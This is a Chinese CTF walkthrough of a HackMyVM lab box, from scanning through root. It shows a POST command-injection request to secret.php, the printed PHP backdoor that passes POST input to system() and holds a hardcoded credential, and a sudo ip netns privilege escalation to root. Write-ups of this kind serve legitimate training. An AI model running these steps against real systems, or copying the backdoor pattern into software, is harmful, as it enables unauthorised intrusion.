信息搜集

主机扫描

arp-scan -l

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p-   192.168.239.198
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-15 11:00 EDT
Nmap scan report for 192.168.239.198
Host is up (0.00032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
MAC Address: 08:00:27:57:7A:C6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

路径扫描

[11:01:32] Starting:                                                                                                                                      
[11:02:01] 200 -  344B  - /index.htm                                        
[11:02:18] 200 -  285B  - /sitemap.xml   

提示带有参数，呢就访问看是什么

在源码处发现一个路径，直接访问

/secret.php,以及一个get参数hackmyvm，但是当我get传参发现错误提示：

┌──(root㉿kali)-[~]
└─# curl http://192.168.239.198/secret.php?HackMyVM
Now the main part what it is loooooool<br>Try other method   

那么我就利用post传参试试

-d 是需要传入的数据

读取secret.php，发现用户以及密码

┌──(root㉿kali)-[~]
└─# curl -X POST 'http://192.168.239.198/secret.php' -d 'HackMyVM=cat secret.php'
You Found ME : - (<pre><?php
if(isset($_GET['HackMyVM'])){
        echo "Now the main part what it is loooooool";
        echo "<br>";
echo "Try other method";
        die;
}
if(isset($_POST['HackMyVM'])){
        echo "You Found ME : - (";
        echo "<pre>";
        $cmd = ($_POST['HackMyVM']);
        system($cmd);
        echo "</pre>";
        die;
}
else {
header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg");
}
$ok="prakasaka:th3-!llum!n@t0r";
?>
</pre>                                                                                                                                                          

获取shell

ssh登录

prakasaka@method:~$ cat uSeR.txt 
e4408105ca9c2a5c*************

提权

直接sudo -l,发现ip可提权

prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
    (!root) NOPASSWD: /bin/bash
    (root) /bin/ip

直接搜索垃圾箱知识产权 | go away垃圾箱 (gtfobins.github.io)

prakasaka@method:~$ sudo ip netns add foo
prakasaka@method:~$ sudo ip netns exec foo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cat rOot.txt
fc9c6eb6265921315***********

知识点

1. 网站源码的信息搜集
2. get与post的提交方式
3. curl的使用，因为会有重定向的跳转